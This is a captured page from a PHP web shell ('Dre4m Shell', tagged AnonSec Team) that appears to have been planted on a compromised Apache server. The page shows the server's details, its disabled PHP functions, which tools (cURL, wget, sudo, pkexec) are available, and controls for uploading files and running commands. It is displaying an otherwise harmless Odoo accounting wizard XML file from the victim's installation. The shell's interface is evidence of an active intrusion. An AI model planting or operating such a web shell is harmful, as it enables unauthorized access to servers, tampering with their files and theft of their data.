Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.119.13.56
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/odoo/addons/account/wizard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /opt/odoo/addons/account/wizard/account_reconcile_view.xml
<?xml version="1.0" encoding="utf-8"?>
<odoo>
    <data>

        <record id="view_account_move_line_reconcile_full" model="ir.ui.view">
            <field name="name">account.move.line.reconcile.full.form</field>
            <field name="model">account.move.line.reconcile</field>
            <field name="arch" type="xml">
                <form string="Reconciliation">
                    <group col="4" string="Reconciliation Transactions">
                        <field name="trans_nbr"/>
                        <newline/>
                        <field name="debit"/>
                        <field name="credit"/>
                        <field name="company_id" invisible="1"/>
                    </group><group string="Write-Off">
                        <field name="writeoff"/>
                    </group>
                    <footer>
                        <button string="Reconcile" name="trans_rec_reconcile_full" type="object" default_focus="1" attrs="{'invisible':[('writeoff','!=',0)]}" class="btn-primary"/>
                        <button string="Reconcile With Write-Off" name="trans_rec_addendum_writeoff" type="object" attrs="{'invisible':[('writeoff','=',0)]}" class="btn-primary"/>
                        <button string="Partial Reconcile" name="trans_rec_reconcile_partial_reconcile" type="object" attrs="{'invisible':['|',('writeoff','=',0),('trans_nbr','&lt;',2)]}" class="btn-primary"/>
                        <button string="Cancel" class="btn-default" special="cancel"/>
                    </footer>
               </form>
            </field>
        </record>

        <record id="action_view_account_move_line_reconcile" model="ir.actions.act_window">
            <field name="name">Reconcile Entries</field>
            <field name="res_model">account.move.line.reconcile</field>
            <field name="view_type">form</field>
            <field name="view_mode">form</field>
            <field name="view_id" ref="view_account_move_line_reconcile_full"/>
            <field name="target">new</field>
        </record>

        <record model="ir.values" id="action_account_move_line_reconcile_prompt_values">
            <field name="model_id" ref="account.model_account_move_line" />
            <field name="name">Reconcile Entries</field>
            <field name="key2">client_action_multi</field>
            <field name="value" eval="'ir.actions.act_window,' +str(ref('action_view_account_move_line_reconcile'))" />
            <field name="key">action</field>
            <field name="model">account.move.line</field>
        </record>

        <record id="account_move_line_reconcile_writeoff" model="ir.ui.view">
            <field name="name">account.move.line.reconcile.writeoff.form</field>
            <field name="model">account.move.line.reconcile.writeoff</field>
            <field name="arch" type="xml">
                <form string="Information addendum">
                    <group string="Write-Off Move" col="4">
                        <field name="journal_id"/>
                        <field name="writeoff_acc_id"/>
                        <field name="date_p"/>
                        <field name="comment"/>
                        <field name="analytic_id" groups="analytic.group_analytic_accounting"/>
                    </group>
                    <footer>
                        <button string="Reconcile" name="trans_rec_reconcile" type="object" default_focus="1" class="btn-primary"/>
                        <button string="Cancel" class="btn-default" special="cancel"/>
                    </footer>
               </form>
            </field>
        </record>
    </data>
</odoo>

Anon7 - 2022
AnonSec Team